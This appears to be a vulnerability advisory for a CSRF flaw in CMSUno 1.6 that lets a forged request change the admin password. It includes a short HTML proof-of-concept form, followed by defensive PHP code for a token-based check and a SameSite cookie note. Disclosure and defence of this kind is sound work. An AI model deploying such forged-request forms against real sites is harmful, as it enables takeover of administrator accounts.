CMSUno 1.6 Cross Site Request Forgery

CMSUno version 1.6 suffers from a cross site request forgery vulnerability.

MD5 | 2dc520d23a1ef4ec186a4cdb1bb261d1

# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-05-31
# Exploit Author: Noth
# Vendor Homepage:
# Software Link:
# Version: v1.6
# CVE : 2020-15600

An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.

PoC :

<form action="" method="POST">
<input type="hidden" name="user" value="admin"/>
<input type="hidden" name="pass" value="yourpassword"/>
<input type="submit" name="user" value="Submit request"/>
</form>
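
The request above succeeds because nothing in it proves it came from a page the application served. A synchronizer-token check on the password-change handler closes that gap. This is an added example, not CMSUno's code and not its 1.6.1 fix; the `csrf_token` field and all function names are hypothetical, and only the `user` and `pass` field names come from the PoC.

```php
<?php
// Added example: generic synchronizer-token CSRF check. Not CMSUno code.
// The "csrf_token" field name and every function name here are hypothetical.

function csrf_issue_token(array &$session): string
{
    // One random token per session, to be embedded in every state-changing form.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_request_is_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Reject when either side is missing or not a string (e.g. csrf_token[]=x).
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false;
    }
    // Constant-time comparison of the session token and the submitted token.
    return hash_equals($expected, $supplied);
}

function handle_password_change(array $session, array $post): int
{
    // Returns the HTTP status the handler would send.
    if (!csrf_request_is_valid($session, $post)) {
        return 403; // forged or tokenless request: change nothing
    }
    if (!isset($post['user'], $post['pass']) || !is_string($post['pass']) || $post['pass'] === '') {
        return 400;
    }
    // ... the application's own password update would run here ...
    return 200;
}

// Constructed sample data: one session, then three requests against it.
$session = [];
$token = csrf_issue_token($session);

$forged = ['user' => 'admin', 'pass' => 'yourpassword']; // same fields as the PoC form
$wrong  = $forged + ['csrf_token' => str_repeat('0', 64)];
$legit  = $forged + ['csrf_token' => $token];

foreach (['forged' => $forged, 'wrong token' => $wrong, 'legit' => $legit] as $name => $post) {
    printf("%-12s -> HTTP %d\n", $name, handle_password_change($session, $post));
}
```

Setting the session cookie with `SameSite=Lax` or `SameSite=Strict` is a complementary control, since it stops the browser from attaching the admin session to cross-site POSTs.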

